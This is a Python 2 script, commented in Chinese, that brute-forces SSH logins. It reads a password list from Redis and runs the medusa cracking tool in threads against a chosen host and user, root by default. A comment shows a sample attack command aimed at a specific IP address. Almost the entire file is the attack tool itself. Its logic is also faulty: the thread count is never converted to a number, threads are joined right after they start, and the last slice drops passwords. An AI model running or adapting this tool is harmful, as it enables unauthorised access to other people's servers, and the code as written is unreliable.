# -*- coding:UTF-8 -*-#
"""
根据Redis的密码字典,暴力破解
"""
import redis
import sys,os
import threading
BIN="/usr/local/bin/medusa"
#medusa -u root -p 123456 -h 111.207.22.72 -M ssh
def threadTask(plist,threadnum):
for xval in plist:
print "Thread-%s:%s" % (threadnum,xval)
CMD=BIN+" -u "+User+' -p "'+xval+'" -h '+Host+' -M ssh'
os.system(CMD)#开始爆破
sys.exit(0)
if __name__=='__main__':
global Host,User
numThread=10 #默认10个线程
Rkey='None'
Host='None'
User='root'
if not sys.argv[1:]:
print "Usage python %s [OPTIONS]" % sys.argv[0]
print "Options are:"
print "-n, -number Number of threads,default:10"
print "-k, -key Redis's key"
print "-u, -user system's needed to crack,default:root"
print "-h, -host server ip"
sys.exit(0)
i=1
while (i<len(sys.argv)):
arg=sys.argv[i]
if arg=='-n' or arg=='-number':
i+=1
numThread=sys.argv[i]
elif arg=='-k' or arg=='-key':
i+=1
Rkey=sys.argv[i]
elif arg=='-u' or arg=='-user':
i+=1
User=sys.argv[i]
elif arg=='-h' or arg=='-host':
i+=1
Host=sys.argv[i]
else:
pass
i+=1
if Rkey=='None':
print "Please input key value!"
sys.exit(0)
if Host=='None':
print "Please input Host IP!"
sys.exit(0)
rds = redis.Redis(host='localhost',port=6379,db=0)
pList=rds.lrange(Rkey,0,-1)#密码字典
totalNum = len(pList) #密码总数量
for threadNum in xrange(numThread):
#每个线程处理的密码数量
dealNum=totalNum/numThread
#最后一个线程处理剩余部分
leftNum=totalNum%numThread
if threadNum!=(numThread-1):
#实例化线程
t=threading.Thread(target=threadTask,args=(pList[threadNum*dealNum:threadNum*dealNum+dealNum],threadNum))
t.start()#启动线程
t.join()#等待线程结束后主进程退出
else:
t=threading.Thread(target=threadTask,args=(pList[threadNum*dealNum:threadNum*dealNum+leftNum],threadNum))
t.start()#启动线程
t.join()#等待线程结束后主进程退出
